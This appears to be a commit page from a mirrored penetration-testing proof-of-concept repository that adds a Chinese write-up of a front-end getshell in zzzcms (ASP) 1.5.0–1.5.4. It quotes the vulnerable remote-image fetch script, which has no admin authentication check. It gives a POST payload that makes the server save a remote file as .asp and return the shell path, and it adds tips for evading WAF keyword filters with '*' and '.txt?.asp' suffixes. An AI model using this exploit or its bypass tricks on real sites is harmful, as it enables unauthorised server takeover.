mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 01:40:29 +00:00
add zzzcms(asp)前台Getshell
This commit is contained in:
Mrxn
parent
99e13a1158
commit
7981d1d31f
153
zzzcms(asp)前台Getshell.md
Normal file
153
zzzcms(asp)前台Getshell.md
Normal file
@ -0,0 +1,153 @@
|
||||
# zzzcms(asp)前台Getshell
|
||||
|
||||
zzzcms > 1.5版本后台添加了/inc/webuploader/目录 参照Ueditor功能
|
||||
问题文件/admin{}/inc/webuploader/getremoteimage.asp(1.5.0版本)
|
||||
|
||||
```asp
|
||||
<!--#include file="../../../inc/zzz_class.asp"-->
|
||||
<%
|
||||
dim remotestr,remotepic,remotesplit,j,newpath,newpicname,newimg,newimgs,upfolder,parentPath
|
||||
upfolder=getform("upfolder","both")
|
||||
if isnul(upfolder) then
|
||||
parentPath=sitepath&upLoadPath
|
||||
else
|
||||
parentPath=sitepath&upLoadPath&upfolder&"/"
|
||||
end if
|
||||
|
||||
remotestr =Trim(Request("file"))
|
||||
remotestr=replace(remotestr,"&" , "&")
|
||||
remotestr=remotestr
|
||||
remotestr=remotestr&"ue_separate_ue"
|
||||
remotesplit=split(remotestr,"ue_separate_ue")
|
||||
newpath=parentPath&DateFormat(now,"yymmdd")&"/"
|
||||
NewFolder newpath
|
||||
for j=0 to ubound(remotesplit)-1
|
||||
newpicname=getrndname()&GetFileExt(remotesplit(j))
|
||||
newimg=SaveRemoteFile(newpath&newpicname,remotesplit(j))
|
||||
if waterMark=1 then waterMarkImg newimg
|
||||
newimgs=newimgs&newimg&"ue_separate_ue"
|
||||
next
|
||||
if remotestr<>"" then
|
||||
if right(newimgs,len("ue_separate_ue"))="ue_separate_ue" then newimgs=left(newimgs,len(newimgs)-len("ue_separate_ue"))
|
||||
end if
|
||||
response.Write "{'url':'"&newimgs&"','tip':'远程图片抓取成功!','srcUrl':'"&remotestr& "'}"
|
||||
|
||||
function getfileExt(filename)
|
||||
if filename="" then getfileExt=".jpg" : exit function
|
||||
getfileExt=mid(filename,InStrRev(filename,"."),len(filename))'获取文件扩展名
|
||||
end function
|
||||
|
||||
|
||||
'==================================================
|
||||
'过程名:SaveRemoteFile
|
||||
'作 用:保存远程的文件到本地
|
||||
'参 数:LocalFileName ------ 本地文件名
|
||||
'参 数:RemoteFileUrl ------ 远程文件URL
|
||||
'==================================================
|
||||
function SaveRemoteFile(LocalFileName,RemoteFileUrl)
|
||||
On Error Resume Next
|
||||
dim Ads,Retrieval,GetRemoteData
|
||||
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
|
||||
With Retrieval
|
||||
.Open "Get", RemoteFileUrl, False, "", ""
|
||||
.Send
|
||||
GetRemoteData = .ResponseBody
|
||||
End With
|
||||
Set Retrieval = Nothing
|
||||
Set Ads = Server.CreateObject("Adodb.Stream")
|
||||
With Ads
|
||||
.Type = 1
|
||||
.Open
|
||||
.Write GetRemoteData
|
||||
.SaveToFile server.MapPath(LocalFileName),2
|
||||
.Cancel()
|
||||
.Close()
|
||||
End With
|
||||
Set Ads=nothing
|
||||
SaveRemoteFile=LocalFileName
|
||||
end function
|
||||
|
||||
'判断远程图片是否存在
|
||||
function CheckURL(byval A_strUrl)
|
||||
On Error Resume Next
|
||||
set XMLHTTP = Server.CreateObject("Microsoft.XMLHTTP")
|
||||
XMLHTTP.open "HEAD",A_strUrl,false
|
||||
XMLHTTP.send()
|
||||
CheckURL=(XMLHTTP.status=200)
|
||||
set XMLHTTP = nothing
|
||||
end function
|
||||
%>
|
||||
```
|
||||
|
||||
对比后台所有文件缺失了后台权限验证包含
|
||||
|
||||
```
|
||||
<!--#include file="../../../inc/zzz_admin.asp" -->
|
||||
```
|
||||
|
||||
问题文件/admin{}/inc/webuploader/getremoteimage.asp(1.5.4版本)
|
||||
|
||||
```asp
|
||||
<!--#include file="../../../inc/zzz_class.asp"-->
|
||||
<%
|
||||
dim remotestr,remotepic,remotesplit,j,newpath,newpicname,newimg,newimgs,upfolder,parentPath
|
||||
upfolder=getform("upfolder","both")
|
||||
if isnul(upfolder) then
|
||||
parentPath=sitepath&upLoadPath
|
||||
else
|
||||
parentPath=sitepath&upLoadPath&upfolder&"/"
|
||||
end if
|
||||
remotestr =Trim(Request("file"))
|
||||
remotestr=replace(remotestr,"&" , "&")
|
||||
remotestr=remotestr
|
||||
remotestr=remotestr&"ue_separate_ue"
|
||||
remotesplit=split(remotestr,"ue_separate_ue")
|
||||
newpath=parentPath&DateFormat(now,"yymmdd")&"/"
|
||||
NewFolder newpath
|
||||
for j=0 to ubound(remotesplit)-1
|
||||
newpicname=getrndname()&"."&GetFileExt(remotesplit(j))
|
||||
newimg=SaveRemoteFile(newpath&newpicname,remotesplit(j))
|
||||
if waterMark=1 then waterMarkImg newimg
|
||||
newimgs=newimgs&newimg&"ue_separate_ue"
|
||||
next
|
||||
remotestr=endstr(remotestr,"ue_separate_ue")
|
||||
echo "{'url':'"&newimgs&"','tip':'远程图片抓取成功!','srcUrl':'"&remotestr& "'}"
|
||||
%>
|
||||
```
|
||||
|
||||
看到这段自定义的echo
|
||||
|
||||
```
|
||||
echo "{'url':'"&newimgs&"','tip':'远程图片抓取成功!','srcUrl':'"&remotestr& "'}"
|
||||
```
|
||||
|
||||
可以猜测PHP开发者参照ASP.NET的Ueditor写出了ASP的代码
|
||||
EXP:
|
||||
|
||||
```
|
||||
POST:
|
||||
/{admin}/inc/webuploader/getremoteimage.asp
|
||||
|
||||
file=http://target.com/*.gif?.asp
|
||||
```
|
||||
|
||||
SHELL在返回包
|
||||
影响版本zzzcms(ASP)1.5.0/1.5.1/1.5.2/1.5.3/1.5.4
|
||||
值得一提的是zzzcms ASP版安装完成后默认后台为随机
|
||||
想要利用需要获得后台地址/admin{随机目录}/inc/webuploader/getremoteimage.asp
|
||||
|
||||
测试发现这个随机后台是个摆设 有兴趣的可以研究研究
|
||||
|
||||
一些tips:
|
||||
|
||||
```
|
||||
.txt?.a*sp.a*sp有时候抓取不到 得先传图片马到他本地再抓本机还有的只能抓https 不支持http
|
||||
其实不光?可以 *也可以 基本上给予关键词拦截的waf 用星号都可以绕过
|
||||
q:新年快乐,流光师傅。 测试了下txt能post上去,asp后缀无法直接po上去,请问怎么突破。
|
||||
a:.txt?.asp
|
||||
```
|
||||
|
||||
注:原文地址:https://www.t00ls.net/articles-59726.html 作者:@[赢时胜流光](https://www.t00ls.net/members-profile-12455.html)
|
||||
|
||||
欢迎大家投稿吐司!
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user